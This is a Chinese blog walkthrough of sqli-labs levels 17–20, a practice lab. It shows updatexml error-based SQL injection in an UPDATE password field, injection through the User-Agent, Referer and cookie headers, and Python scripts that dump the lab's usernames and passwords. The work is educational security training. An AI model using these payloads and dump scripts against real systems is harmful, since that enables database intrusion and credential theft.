sqli-labs less17-20
LESS 17 基于错误的UPDATE查询
源码中的几个php函数:
- get_magic_quotes_gpc()
magic_quotes_gpc函数在php中的作用是判断解析用户提示的数据,如包括有:post、get、cookie过来的数据增加转义字符“ ”,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误
get_magic_quotes_gpc()就是取得php环境变量magic_quotes_gpc的值
- addslashes() & stripslashes()
addslashes() 函数在指定的预定义字符前添加反斜杠:
单引号 (‘),双引号 (“),反斜杠 (),NULL
stripslashes() 函数删除由 addslashes() 函数添加的反斜杠。
- ctype_digit()
检测字符串中的字符是否都是数字,负数和小数会检测不通过,这是验证是否正整数的函数简单方法
- mysql_real_escape_string()
mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。
下列字符受影响:
- \x00
- \n
- \r
- \
- ‘
- “
- \x1a
如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。
- intval(mixed $var [, int $base ])
通过使用特定的进制转换(默认是十进制),参数base表示进制,只有当var是字符串时,base才会有意义,表示按照base进制来对var进行转换,返回变量 var 的 integer 数值
通过源码可以得知,后台对输入的uname,如果是字符串,则先用mysql_real_escape_string()函数转义,再用单引号包裹,但是没有对passwd字段做处理,所以可以考虑对passwd字段进行注入,最后经过了解,发现这里需要使用updatexml报错注入
MYSQL函数:UPDATEXML(XML_document, XPath_string, new_value);
- 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
- 第二个参数:XPath_string (Xpath格式的字符串)
- 第三个参数:new_value,String格式,替换查找到的符合条件的数据
- 作用:改变文档中符合条件的节点的值
如果XPath_string的值不是XPath格式的字符串,则会报错:
构造paylod(username填任意一个用户名都可):
User Name : admin
New Password : ‘ where username = updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1);#
报错:
XPATH syntax error: ‘~10.1.32-MariaDB~’
于是按照例行步骤
User Name : admin
New Password : ‘ where username = updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1);#结果:XPATH syntax error: ‘~emails,referers,uagents,users~’
脚本爆破:
from urllib import request
from urllib import parse
import re
url = "http://localhost/sqli-labs-master/Less-17/"
i = 0
while True:
data = {"uname":"admin", "passwd":"' where username = updatexml(1,concat(0x7e,(select username from users limit "+str(i)+",1),0x7e,(select password from users limit "+str(i)+",1),0x7e),1);#"}
response = request.urlopen(url, parse.urlencode(data).encode()).read().decode()
info = re.search(r"~.+~", response)
if(info == None):
break
else:
print(info.group())
i += 1
|
结果:
~Dumb~Dumb~
~Angelina~I-kill-you~
~Dummy~p@ssword~
~secure~crappy~
~stupid~stupidity~
~superman~genious~
~batman~mob!le~
~admin~admin~
~admin1~admin1~
~admin2~admin2~
~admin3~admin3~
~dhakkan~dumbo~
~admin4~admin4~
LESS 18 HEADER注入-Uagent字段
本关登录前会显示IP地址,登录后显示request数据包的header字段
查看源码发现在显示header之前使用INSERT语句将header数据插入到uagents表中,考虑到可以在insert语句中使用updatexml函数报错,所以这里使用抓包工具修改header字段:
POST /sqli-labs-master/Less-18/ HTTP/1.1
Host: localhost
Content-Length: 38
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: ‘ or updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) or ‘
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8
Referer: http://localhost/sqli-labs-master/Less-18/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.536075346.1526537016
Connection: close
uname=admin&passwd=admin&submit=Submit
结果:
Your User Agent is: ‘ or updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) or ‘
XPATH syntax error: ‘~10.1.32-MariaDB~’
接下来的步骤和上一关相同,脚本:
from urllib import request
from urllib import parse
import re
url = "http://localhost/sqli-labs-master/Less-18/"
i = 0
while True:
data = {"uname": "admin", "passwd": "admin"}
header = {"User-Agent": "' or updatexml(1,concat(0x7e,(select username from users limit "+str(i)+",1),0x7e,(select password from users limit "+str(i)+",1),0x7e),1) or '"}
req = request.Request(url, data = parse.urlencode(data).encode(), headers = header)
response = request.urlopen(req).read().decode()
info = re.search(r"~.+~", response)
if(info == None):
break
else:
print(info.group())
i += 1
|
LESS 19 HEADER注入-Referer字段
这关登录成功后显示的是header里的Referer字段,所以把上一关的User-Agent改成Referer即可成功,原理和上一关是一样的
LESS 20 COOKIE注入
源码中的判断语句有些长,梳理一下:
- 判断Cookie中的uname是否被设置,若没有,返回的是登录前界面,这里对username和password都做了输入检查,登陆成功后发放Cookie
- 若uname非空,则再判断submit是否被设置(即有Cookie的用户是否选择删除Cookie),若没有,则用uname作参数查询数据库并返回相应信息
- 若submit非空(即用户点击Delete Cookie按钮),则删除Cookie(即设置Cookie有效时间为负值)
由于未对cookie做输入检查,同时select语句使用了cookie的uname值
所以修改cookie为:
Cookie: uname=’ union select 1,2,3#; _ga=GA1.1.536075346.1526537016
结果
Your Login name:2
Your Password:3
Your ID:1
继续:
Cookie: uname=’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#;
Cookie: uname=’ union select 1,group_concat(username),group_concat(password) from users#;
Cookie: uname=’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=’users’#;
Cookie: uname=’ union select group_concat(id),group_concat(username),group_concat(password) from users#;
结果:
Your Login name:Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
Your ID:1,2,3,4,5,6,7,8,9,10,11,12,14
https://soporbear.github.io/2018/06/01/sqli-lab-less17-22/